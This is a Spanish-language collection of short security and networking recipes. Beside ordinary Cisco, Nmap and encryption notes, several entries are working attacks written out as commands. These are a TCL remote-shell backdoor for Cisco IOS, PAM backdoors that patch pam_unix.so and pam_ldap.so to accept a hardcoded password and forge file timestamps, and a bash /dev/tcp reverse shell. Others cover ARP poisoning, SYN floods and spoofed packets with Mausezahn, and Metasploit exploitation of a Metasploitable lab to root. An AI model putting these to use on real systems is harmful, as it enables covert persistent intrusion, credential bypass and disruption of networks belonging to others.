# IOS backdoor con TCL

Introducción

IOS backdoor
TCL

Ejecución
Router#tclsh
Router(tcl)#proc backdoor {port} {
+> global shell loop
+> set shell [socket -server bdsh $port]
+> vwait loop
+> close $shell
+>}

Router(tcl)#proc bdsh {socket ip port} {
+> fconfigure $socket -buffering line
+> puts -nonewline $socket "#"
+> flush $socket
+> fileevent $socket readable [list echo $socket]
+>}

Router(tcl)#proc echo {socket} {
+> global loop
+> if {![catch {gets $socket command}] && ![eof $socket]} {
+>  switch -exact -- $command {
+>   :exit { return [close $socket] }
+>   :stop { set loop end; return [close $socket] }
+>   default { execute $socket $command }
+>  }
+> }
+>}

Router(tcl)#proc execute {socket command} {
+> catch {eval "exec $command"} output
+> if {[catch {puts $socket $output}]} {
+>  return [close $socket]
+> } else {
+>  puts -nonewline $socket "#"
+>  flush $socket
+> }
+>}

Router(tcl)#backdoor 1234
remote_host# ncat Router 1234
#show run | i hostname
hostname Router
#

# IOS Server Load Balancing (SLB)

Introducción

SLB

Dispatched mode (mac-rewrite)
r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice
SRV1#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV2#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV3#show run | i ^interface|^ ip|^ip route
interface Loopback0
 ip address 192.168.11.254 255.255.255.255
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
Directed mode (NAT)
r7200(config)#ip slb serverfarm telnet_srvfarm
r7200(config-slb-sfarm)#predictor leastconns
r7200(config-slb-sfarm)#nat server
r7200(config-slb-sfarm)#real 192.168.1.1
r7200(config-slb-real)#weight 16
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.2
r7200(config-slb-real)#inservice
r7200(config-slb-sfarm)#real 192.168.1.3
r7200(config)#ip slb vserver telnet_vserver
r7200(config-slb-vserver)#virtual 192.168.11.254 tcp telnet
r7200(config-slb-vserver)#serverfarm telnet_srvfarm
r7200(config-slb-vserver)#inservice
SRV1#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.1 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV2#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.2 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254
SRV3#show run | i ^interface|^ ip|^ip route
interface FastEthernet0/0
 ip address 192.168.1.3 255.255.255.0
ip route 0.0.0.0 0.0.0.0 192.168.1.254

# Filtrando con CBAC y ZFW

Introducción

CBAC
ZFW

CBAC (Context-Based Access Control)
Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                   
external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2
internal_host#ping external_host
!!!!!
Router(config)#access-list 100 deny ip any any
Router(config)#int fa0/0
Router(config-if)#ip access-group 100 in
internal_host#ping external_host
....
Router(config)#ip inspect name allow_icmp icmp
Router(config)#int fa0/0
Router(config-if)#ip inspect allow_icmp out
internal_host#ping external_host
!!!!!
ZFW (Zone-Based Policy Firewall)
Router#show run | i ^interface|^ description|^ ip
interface FastEthernet0/0
 description outside
 ip address 192.168.1.1 255.255.255.0
interface FastEthernet0/1
 description inside
 ip address 192.168.0.1 255.255.255.0
Router#show hosts | i IP                    
external_host             None  (perm, OK)  0   IP    192.168.1.2
internal_host             None  (perm, OK)  0   IP    192.168.0.2
internal_host#ping external_host
!!!!!
Router(config)#zone security outside_zone
Router(config)#zone security inside_zone
Router(config)#int fa0/0
Router(config-if)#zone-member security outside_zone
Router(config-if)#int fa0/1
Router(config-if)#zone-member security inside_zone
internal_host#ping external_host
....
Router(config)#class-map type inspect match-any icmp_map
Router(config-cmap)#match protocol icmp
Router(config)#policy-map type inspect icmp_policy
Router(config-pmap)#class type inspect icmp_map
Router(config-pmap-c)#inspect
Router(config)#zone-pair security inside2outside source inside_zone destination outside_zone
Router(config-sec-zone-pair)#service-policy type inspect icmp_policy
internal_host#ping external_host
!!!!!

# Linux backdoor con pam_ldap.so

Introducción

PAM

Ejecución
# apt-get install dpkg-dev flex libldap2-dev 
# dpkg --search pam_ldap.so
# apt-get source libpam-ldap=`dpkg -s libpam-ldap \
| grep -i version | cut -d' ' -f2`
# midir=`pwd`
# cd libpam-ldap-184/
# tar xvzf pam_ldap-184.tar.gz
# cd pam_ldap-184
# ln -s $midir/pam-1.1.1/libpam/include/security/ /usr/include/security
# sed -i '/^  _connect_anonymously/ a \ \ if (strcmp(password, "micasa") == 0) { rc = PAM_SUCCESS; }' pam_ldap.c
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_ldap.so \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_ldap.so .
# cp $midir/libpam-ldap-184/pam_ldap-184/pam_ldap.so /lib/security/.
# touch -t $timestamp /lib/security/pam_ldap.so

# Sockets con bash

Introducción

/dev

Ejecución

Petición http sin esperar respuesta
# echo "get /" > /dev/tcp/www.google.com/80
Petición y respuesta http
# exec 3<>/dev/tcp/www.google.com/80
# echo "get /" >&3
# cat <&3
# exec 3>&-
Enviar una shell inversa desde local a remoto
remoto# nc -v -l 192.168.0.10 1234
local# exec 4<>/dev/tcp/192.168.0.10/1234
local# cat <&4 | while read line; do $line 2>&4 >&4; done
remoto#
>hostname
>local

# Configuración inicial sin reload

Introducción

Para obtener la configuración inicial por defecto en los dispositivos Cisco borramos dos ficheros (nvram:startup-config y flash:vlan.dat) y seguidamente reiniciamos el dispositivo (reload).
Para obtener una configuración equivalente a la inicial pero sin reiniciar el dispositivo (ahorrando el tiempo de espera) podemos seguir el siguiente procedimiento.

Ejecución
#! Lo primero que hacemos después de
#! arrancar el dispositivo
#copy system:running-config flash:initial-config
#! Después configuramos el dispositivo
#! Cuando queramos recuperar la configuración
#! equivalente a la inicial, ejecutamos:
#configure replace flash:initial-config force
#delete /force flash:vlan.dat

# Esteganografía en imágenes jpg

Introducción

Steghide

Ejecución
# apt-get install steghide
# wget -O luna.jpg http://tinyurl.com/6earlrf
# steghide info luna.jpg | grep -i cap
  capacidad: 1,5 KB
# ls -la > listado
# steghide --embed -cf luna.jpg -ef listado
# mv listado listado.orig
# steghide --extract -sf luna.jpg
# diff listado listado.orig
#

# Symmetric encryption from the command-line



OpenSSL

# openssl enc -aes-256-cbc -salt -in msg.txt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc -out msg.txt
# date | openssl enc -aes-256-cbc -salt -out msg.txt.enc
# openssl enc -aes-256-cbc -d -in msg.txt.enc > msg.txt

GnuPG

# gpg --cipher-algo AES256 --symmetric -o msg.txt.enc msg.txt
# gpg --decrypt -o msg.txt msg.txt.enc
# date | gpg --cipher-algo AES256 --symmetric -o msg.txt.enc
# gpg --decrypt msg.txt.enc > msg.txt

Mcrypt

# mcrypt --algorithm rijndael-256 --bare msg.txt
# mcrypt --algorithm rijndael-256 --bare --decrypt msg.txt.nc
# date | mcrypt --algorithm rijndael-256 --bare > msg.txt.nc
# cat msg.txt.nc | mcrypt --algorithm rijndael-256 --bare --decrypt > msg.txt

Ccrypt

# ccrypt --encrypt msg.txt
# ccrypt --decrypt msg.txt.cpt
# date | ccrypt --encrypt > msg.txt.cpt
# cat msg.txt.cpt | ccrypt --decrypt > msg.txt

# Esteganografía en ficheros de texto

Introducción

Snow

Ejecución
# mkdir snow
# cd snow
# wget http://www.darkside.com.au/snow/snow-20091217.tar.gz
# tar xvzf snow-20091217.tar.gz
# cd snow-20091217
# make
# ./snow -S main.c
File has storage capacity of between 5669 and 6275 bits.
Approximately 746 bytes.
# ./snow -C -Q -p "micon" -m "tracking" main.c main_modificado.c
# ./snow -C -p "micon" main_modificado.c
tracking

# Borrar de forma segura

Introducción

Secure-delete

Ejecución
# srm -vz punto_montaje/fichero.pdf # fichero
# sfill -vz punto_montaje/ # espacio libre de un disco
# swapoff /dev/sda5; sswap -vz /dev/sda5; swapon /dev/sda5 # swap
# sdmem -vz # ram

# Linux backdoor con pam_unix.so

Introducción

PAM

Ejecución
# apt-get install dpkg-dev flex
# apt-get source libpam-modules=`dpkg -s libpam-modules \
> | grep -i version | cut -d' ' -f2`
# cd pam-1.1.1/modules/pam_unix/
# sed -i '/\tretval = _unix_verify_password(pamh, name, p, ctrl);/ a \\tif (strcmp(p, \"micasa\") == 0) { retval = PAM_SUCCESS; }' pam_unix_auth.c
# cd ../..
# ./configure
# make
# cd
# timestamp=`ls -l /lib/security/ | grep pam_unix.so | grep -v ^l \
> | awk '{print $6$7}' | tr -d '-' | tr -d ':'`
# cp /lib/security/pam_unix.so .
# cp pam-1.1.1/modules/pam_unix/.libs/pam_unix.so /lib/security/.
# touch -t $timestamp /lib/security/pam_unix.so

# Traceroute con hping3

Introducción

hping3

Ejecución
# hping3 -S -p 22 -n --traceroute --tr-no-rtt --fast 192.168.8.1
HPING server1.network8.local (eth0 192.168.8.1): S set, 40 headers + 0 data bytes
hop=1 TTL 0 during transit from ip=192.168.1.1
hop=2 TTL 0 during transit from ip=192.168.2.1
hop=3 TTL 0 during transit from ip=192.168.3.1
hop=4 TTL 0 during transit from ip=192.168.4.1
hop=5 TTL 0 during transit from ip=192.168.5.1
hop=6 TTL 0 during transit from ip=192.168.6.1
ctrl+z
8: len=50 ip=192.168.8.1 ttl=57 DF id=0 sport=22 flags=SA seq=24 win=5840 rtt=27.7 ms

# Reto contraseñas postgres (md5, salt)

Introducción

En el reto 'networking 3' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos postgres.
Usuario: postgres
Salt: 0e5da2d1
Contraseña: 6fcd671f668c3c8efca3308f6f41bd17

Ejecución
# cat diccionario.txt
hack
tracking
Jixi
wargame
# cat postgres_md5_salt.sh
#!/bin/bash
# Dictionary check for a captured PostgreSQL MD5-auth response.
#
# For every line of a word list it recomputes the two-stage digest the
# loop below implements, md5( md5(secret + user) + salt ), with the salt
# given as hex and decoded to raw bytes, and prints the word whose result
# equals the captured value.  The captured value is compared as a bare
# 32-hex digest, exactly as passed in $4.
#
# Arguments:
#   $1  user name mixed into the first digest
#   $2  salt as a hex string (4 bytes in the example: 0e5da2d1)
#   $3  path to the word list, one candidate per line
#   $4  captured password hash, 32 hex chars
# Output: "<secret> --> <hash>" for each matching line; nothing otherwise.
#
# Each candidate costs two md5sum calls and the salt is not secret, which is
# why a captured exchange of this scheme can be checked offline; PostgreSQL's
# SCRAM-SHA-256 method exists to replace it.

# Decode a hex string to raw bytes (the salt is mixed in as bytes, not as
# its hex text).
function hex2ascii {
 printf %s $1 | xxd -r -p
}
# Hex MD5 digest of the argument.  $1 is unquoted: whitespace inside a
# candidate is dropped before hashing (printf %s joins the split words),
# harmless for the single-word list used here but wrong for such entries.
function md5 {
 printf %s $1 | md5sum | cut -d ' ' -f1
}

user=$1
# raw salt bytes: a NUL byte cannot be held in a shell variable and a
# whitespace byte would be dropped by the unquoted expansion in md5 --
# the example salt 0e5da2d1 contains neither.
salt=`hex2ascii $2`
password_file=$3
captured_password=$4

# read without -r: a backslash in a dictionary line is interpreted rather
# than hashed literally.
while read secret
do
 # stage 1: md5(secret + user), as hex text
 hash_stage_1=`md5 $secret$user`
 #echo $hash_stage_1
 # stage 2: md5(stage-1 hex + raw salt bytes) -- compared with the capture
 generated_password=`md5 $hash_stage_1$salt`
 #echo $generated_password
 # unquoted operands: if either value were empty, [ would report an error
 # instead of a mismatch; 32-hex digests are never empty
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./postgres_md5_salt.sh postgres 0e5da2d1 \
diccionario.txt \
6fcd671f668c3c8efca3308f6f41bd17
Jixi --> 6fcd671f668c3c8efca3308f6f41bd17

# Reto contraseñas mysql (sha1, salt)

Introducción

En el reto 'networking 2' del wargame de sbd 2011 proporcionan un pcap con el proceso de autenticación contra una base de datos mysql.
Utilizaremos un salt y una contraseña distintos.
Salt: x8MXV%QLgDZ{ypGN6^Y#
Contraseña: d648fcba578670abf1ec93b0dce1b41f681dc71c

Ejecución
# cat diccionario.txt
hack
tracking
wargame
# cat mysql_sha1_salt.sh
#!/bin/bash
# Dictionary check for a captured MySQL native-auth response (SHA1 + salt).
#
# For every word in the list it recomputes what the loop below implements:
#   stage1 = sha1(secret)
#   stage2 = sha1(raw(stage1))
#   stage3 = sha1(salt + raw(stage2))
#   result = stage1 XOR stage3          (hex strings, one hex digit at a time)
# and prints the word whose result equals the captured 40-hex value.
#
# Arguments:
#   $1  salt / challenge string (20 chars in the example: x8MXV%QLgDZ{ypGN6^Y#)
#   $2  path to the word list, one candidate per line
#   $3  captured password hash, 40 hex chars
# Output: "<secret> --> <hash>" for each matching line; nothing otherwise.
#
# Three sha1sum calls per candidate and a challenge that is not secret make a
# captured handshake cheap to test offline; this is the scheme that
# caching_sha2_password replaced as MySQL's default.

# Print a decimal value as lowercase hex, no padding.
function dec2hex {
 printf %x $1
}
# Decode a hex string to raw bytes.  Bash drops NUL bytes from command
# substitution output, so a digest containing 0x00 is mangled in the raw(...)
# steps below and such a candidate cannot be verified by this script.
function hex2ascii {
 printf %s $1 | xxd -r -p
}
# Numeric value of a 0x-prefixed hex literal.
function hex2dec {
 printf %d $1
}
# Hex SHA1 digest of the argument.  $1 is unquoted: whitespace inside the
# value is dropped (printf %s joins the split words), and raw digest bytes
# are also subject to pathname expansion -- a byte sequence that happens to
# match a file name in the current directory would be replaced by it.
function sha1 {
 printf %s $1 | sha1sum | cut -d ' ' -f1
}
# XOR two hex strings of $1 characters, digit by digit (digit-wise XOR of
# the hex text equals byte-wise XOR of the decoded bytes).
# All four variables are globals and `xored` is never reset; the caller
# invokes this inside backticks, so each call runs in a subshell and starts
# with an empty accumulator -- calling it twice in the same shell would
# append to the previous result.
function xor {
 # $[ ] is the legacy bash arithmetic form of $(( ))
 length=$[$1-1]
 string_a=$2
 string_b=$3
 for i in `seq 0 $length`
 do
  a=`hex2dec 0x${string_a:$i:1}`
  b=`hex2dec 0x${string_b:$i:1}`
  # a ^ b is 0..15, so dec2hex yields exactly one hex digit
  xored=$xored`dec2hex $(printf '%d' $[$a^$b])`
 done
 printf %s $xored
}

salt=$1
password_file=$2
captured_password=$3

# read without -r: a backslash in a dictionary line is interpreted rather
# than hashed literally.
while read secret
do
 hash_stage_1=`sha1 $secret`
 # the *_ variables hold the raw 20 bytes of the preceding hex digest
 hash_stage_1_=`hex2ascii $hash_stage_1`
 #echo $hash_stage_1
 hash_stage_2=`sha1 $hash_stage_1_`
 hash_stage_2_=`hex2ascii $hash_stage_2`
 #echo $hash_stage_2
 # the salt is concatenated as the literal challenge text, not decoded
 hash_stage_3=`sha1 $salt$hash_stage_2_`
 #echo $hash_stage_3
 # 40 = length of a hex SHA1 digest
 generated_password=`xor 40 $hash_stage_1 $hash_stage_3`
 #echo $generated_password
 if [ $generated_password == $captured_password ]
 then
  echo "$secret --> $captured_password"
 fi
done < $password_file
# ./mysql_sha1_salt.sh x8MXV%QLgDZ{ypGN6^Y# \
diccionario.txt \
d648fcba578670abf1ec93b0dce1b41f681dc71c
tracking --> d648fcba578670abf1ec93b0dce1b41f681dc71c

# Mausezahn (interactive mode)

Introducción

Mausezahn

Instalación
# cd
# mkdir mz
# cd mz
# wget http://www.perihel.at/sec/mz/mz-0.40.tar.gz
# tar xvzf mz-0.40.tar.gz
# cd mz-0.40
# apt-get install cmake
# apt-get install libpcap0.8-dev
# apt-get install libnet1-dev
# apt-get install libcli-dev
# cmake .
# make
Ejecución
# cd src/
# ./mz -x 1234
# telnet localhost 1234
Escape character is '^]'.

Username: mz
Password: mz

mz-0.40> en
Password: mops
mz-0.40# show ?
mz-0.40# conf t
mz-0.40(config)# packet
mz-0.40(config-pkt-2)# ?
mz-0.40(config-pkt-2)# name prueba
mz-0.40(config-pkt-2)# desc Esto es una prueba
mz-0.40(config-pkt-2)# ip address source 192.168.1.110
mz-0.40(config-pkt-2)# ip address destination 192.168.1.1
mz-0.40(config-pkt-2)# port destination 80
mz-0.40(config-pkt-2)# tag ?
mz-0.40(config-pkt-2)# interval ?
mz-0.40(config-pkt-2)# count ?
mz-0.40(config-pkt-2)# count 1
mz-0.40(config-pkt-2)# delay ?
mz-0.40(config-pkt-2)# type ?
mz-0.40(config-pkt-2)# type tcp
mz-0.40(config-pkt-2-tcp)# flags syn
mz-0.40(config-pkt-2-tcp)# end
mz-0.40(config-pkt-2)# payload ascii Envío de un syn tcp
mz-0.40(config-pkt-2)# end
mz-0.40(config)# exit
mz-0.40# show packet 2
mz-0.40# run id 2
mz-0.40# launch ?
mz-0.40# launch bpdu
mz-0.40# stop 3
mz-0.40# launch synflood 192.168.1.1
mz-0.40# stop all
mz-0.40# exit
# cat > f.mops << eof
> conf t
> packet
> count 1
> payload hex 64:68:0c:ab:5f:f3:aa:00 04:00:0a:04:08:00:45:00 00:3c:2d:00:00:00:ff:06 0a:fc:c0:a8:01:6e:c0:a8 01:01:00:00:00:50:ca:fe ba:be:00:00:00:00:50:02 00:64:23:43:00:00:45:6e 76:c3:ad:6f:20:64:65:20 75:6e:20:73:79:6e:20:74 63:70
> eof
# telnet localhost 1234
mz-0.40# load ./f.mops
mz-0.40# run id 5

# Mausezahn (direct mode)

Introducción

Mausezahn

Instalación
# apt-get install mz
Tipos de paquetes
# mz -t help

|  The following packet types are currently implemented:
|
|  arp            ... sends ARP packets
|  bpdu           ... sends BPDU packets (STP)
|  cdp            ... sends CDP messages
|  ip             ... sends IPv4 packets
|  udp            ... sends UDP datagrams
|  tcp            ... sends TCP segments
|  icmp           ... sends ICMP messages
|  dns            ... sends DNS messages
|  rtp            ... sends RTP datagrams
|  syslog         ... sends Syslog messages

# mz eth0 -t ip -P "hola mundo" # payload ascii
# mz eth0 -t ip "p=68:6f:6c:61:20:6d:75:6e:64:6f,ttl=1" # payload hexadecimal
Repetición y retardo
# Infinitos paquetes
# mz eth0 -c 0 -t dns "q=www.perihel.at" -B 8.8.8.8
# 100 paquetes, uno cada 2 segundos
# mz eth0 -c 100 -d 2s -t dns "q=www.perihel.at" -B 8.8.8.8
Direcciones de origen y destino
# @mac origen y destino
# mz eth0 -t arp "request,targetip=192.168.1.100" \
-a own -b ff:ff:ff:ff:ff:ff
# @ip origen y destino
# mz eth0 -t dns "q=www.perihel.at" -A rand -B 8.8.8.8
Tramas raw de nivel 2
# mz eth0 -c 0 -a rand -b bcast -p 1000 "08:00-ca-fe-03:e8"
Trama arp
# Envenenamiento de la cache arp
# mz eth0 -t arp "reply,sip=192.168.1.1,\
tmac=aa:00:04:00:0a:04,tip=192.168.1.50"
Trama bpdu
# Anuncio como puente raíz de la vlan 1
# mz eth0 -t bpdu "pri=0,vlan=1"
Trama cdp
# Llena la base de datos del dispositivo vecino con tlv_id aleatorios
# mz eth0 -c 0 -a rand -t cdp change
Trama 802.1q
# Vlan=500 y CoS=7
# mz eth0 -Q 7:500 -t icmp ping
# Vlan_externa=100 y vlan_interna=200
# mz eth0 -Q 100,200 -t icmp ping
Trama mpls
# Etiqueta_externa=200 y etiqueta_interna=100
# mz eth0 -M 100,200 -t icmp ping
Paquete ip
# Con paquete raw icmp
# mz eth0 -t ip "dscp=46,ttl=1,proto=1,\
p=08:00-8b:86-de:ad-be:af-68:6f:6c:61:20:6d:75:6e:64:6f"
Segmento udp
# Con paquete raw dns
# mz eth0 -t udp "dp=53,p=c5:2f-01:00-00:01-00:00-00:00-00:00-\
03:77:77:77:07:70:65:72:69:68:65:6c:02:61:74:00-00:01-00:01"
Segmento tcp
# Inundación tcp syn al puerto 80
# mz eth0 -A rand -B 192.168.1.50 -t tcp "sp=7,dp=80,flags=syn" -P "DoS test"
# Finaliza la sesión tcp repitiendo el último nseq entre A y B
# mz eth0 -A 192.168.1.50 -B 192.168.1.1 -t tcp "sp=36772,dp=23,flags=rst,s=1090420293"
Protocolo rtp
# Medición del jitter, pérdida de paquetes y reordenación
# mz lo -T rtp id=12:34:56:78 # servidor
# mz eth0 -B 192.168.1.50 -t rtp id=12:34:56:78 # cliente
Protocolo syslog
# Envío de mensaje falsificando la @ip de origen
# mz -A 192.168.1.50 -B 192.168.1.1 -t syslog sev=0 \
-P "Mensaje enviado al servidor syslog"

# Autopwn

Introducción

Autopwn

Ejecución
# svn update /opt/metasploit3/msf3/
# msfconsole
msf > db_nmap -PN -sS -sV 192.168.1.50

Interesting ports on 192.168.1.50:
Not shown: 988 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         ProFTPD 1.3.1
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB
8009/tcp open  ajp13?
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > db_autopwn -h
[*] Usage: db_autopwn [options]
        -h          Display this help text
        -t          Show all matching exploit modules
        -x          Select modules based on vulnerability references
        -p          Select modules based on open ports
        -e          Launch exploits against all matched targets
        -r          Use a reverse connect shell
        -b          Use a bind shell on a random port (default)
        -q          Disable exploit module output
        -R  [rank]  Only run modules with a minimal rank
        -I  [range] Only exploit hosts inside this range
        -X  [range] Always exclude hosts inside this range
        -PI [range] Only exploit hosts with these ports open
        -PX [range] Always exclude hosts with these ports open
        -m  [regex] Only run modules whose name matches the regex
        -T  [secs]  Maximum runtime for any exploit in seconds
msf > db_autopwn -t -p -e
Active sessions
===============

  Id  Type       Connection                                Via
  --  ----       ----------                                ---
  1   shell php  192.168.1.100:40803 -> 192.168.1.50:5452  exploit/unix/webapp/tikiwiki_graph_formula_exec


msf > session -i 1
msf > db_autopwn -t -x -e
Active sessions
===============

  Id  Type       Connection                                 Via
  --  ----       ----------                                 ---
  2   shell php  192.168.1.100:39008 -> 192.168.1.50:12186  exploit/unix/webapp/tikiwiki_graph_formula_exec

msf > session -i 2

# Nmap

Introducción

Nmap

Normal (tcp syn)
# nmap 192.168.0.1
Varios objetivos
# nmap 192.168.0.1 192.168.0.2
# nmap 192.168.0.1-10
# nmap 192.168.0.0/24
# cat > objetivos.txt << eof
> 192.168.0.11
> 192.168.0.51
> 192.168.0.101
> eof
# nmap -iL objetivos.txt
# nmap 192.168.0.0/24 --exclude 192.168.0.10-100
# nmap 192.168.0.0/24 --excludefile objetivos.txt
Descubrimiento
# nmap -PN 192.168.0.1 # no hagas ping
# nmap -PS 192.168.0.1 # ping tcp syn
# nmap -PA 192.168.0.1 # ping tcp ack
# nmap -PU 192.168.0.1 # ping udp
# nmap -PY 192.168.0.1 # ping sctp init
# nmap -PE 192.168.0.1 # ping icmp echo
# nmap -PP 192.168.0.1 # ping icmp timestamp
# nmap -PM 192.168.0.1 # ping icmp address mask
# nmap -PO 192.168.0.1 # ping protocolo ip
# nmap -PR 192.168.0.1 # ping arp
# nmap --traceroute 192.168.0.1 # traceroute
Escaneo
# nmap -sP 192.168.0.1 # solo ping
# nmap -sS 192.168.0.1 # tcp syn
# nmap -sT 192.168.0.1 # tcp connect (three-way-handshake)
# nmap -sU 192.168.0.1 # udp
# nmap -sN 192.168.0.1 # tcp null
# nmap -sF 192.168.0.1 # tcp fin
# nmap -sA 192.168.0.1 # tcp ack
# nmap -sX 192.168.0.1 # tcp christmas tree (fin + push + urg)
# nmap --scanflags URGACKPSHRSTSYNFIN 192.168.0.1 # tcp a medida
# nmap -F 192.168.0.1 # escaneo rápido (los 100 puertos más conocidos)
# nmap --top-ports 10 192.168.0.1 # los 10 puertos más conocidos
# nmap -p http,https 192.168.0.1 # nombre de puertos
# nmap -p 1-80 192.168.0.1 # rango de puertos
# nmap -p U:1-50,T:51-100 192.168.0.1 # rango de puertos por protocolo
# nmap -p "*" -r 192.168.0.1 # todos los puertos secuencialmente
Detección
# nmap -O 192.168.0.1 # sistema operativo
# nmap -sV 192.168.0.1 # versión de los servicios
Evasión
# nmap -f 192.168.0.1 # fragmentar en paquetes ip de 8 bytes
# nmap --mtu 16 192.168.0.1 # fragmentar en paquetes ip de 16 bytes
# nmap -D RND:5 192.168.0.1 # genera 5 @ip aleatorias (señuelos)
# nmap -sI 192.168.0.10 192.168.0.1 # escaneo utilizando un zombie
# nmap --source-port 80 192.168.0.1 # puerto de origen 80
# nmap --data-length 40 192.168.0.1 # añade 40 bytes
# nmap --spoof-mac 0 192.168.0.1 # utiliza una @mac de origen aleatoria
Formato de salida
# nmap -oN ft.txt 192.168.0.1 # fichero de texto
# nmap -oX fx.xml 192.168.0.1 # fichero xml

# Flujos alternativos de datos (ADS)

Introducción

Alternate Data Streams

Ejecución
>mkdir ADS
>cd ADS
>echo "Información visible" > f.txt
>echo "Información oculta" > f.txt:s1.txt
>more < f.txt
"Información visible"

>more < f.txt:s1.txt
"Información oculta"

>notepad f.txt:s1.txt
>type %systemroot%\system32\calc.exe > f.txt:s2.exe
>start .\f.txt:s2.exe
>type %systemroot%\media\tada.wav > ..\ADS:tada.wav
>start ..\ADS:tada.wav

# Metasploitable (samba)

Introducción

Samba: Remote Command Injection Vulnerability

Ejecución
# msfconsole
msf > nmap -sV -O -p 100-500 192.168.1.50
[*] exec: nmap -sV -O -p 100-500 192.168.1.50

Not shown: 399 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop

msf > search samba
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > set rhost 192.168.1.50
msf exploit(usermap_script) > set rport 445
msf exploit(usermap_script) > set payload cmd/unix/reverse
msf exploit(usermap_script) > set lhost 192.168.1.100
msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo fXQUYEFiaAED6rM4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "fXQUYEFiaAED6rM4\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.50:58167)
uname -a
Linux metasploitable 2.6.24-16-server i686 GNU/Linux
whoami
root

# Metasploitable (postgres + openssl)

Introducción

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

Ejecución
# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
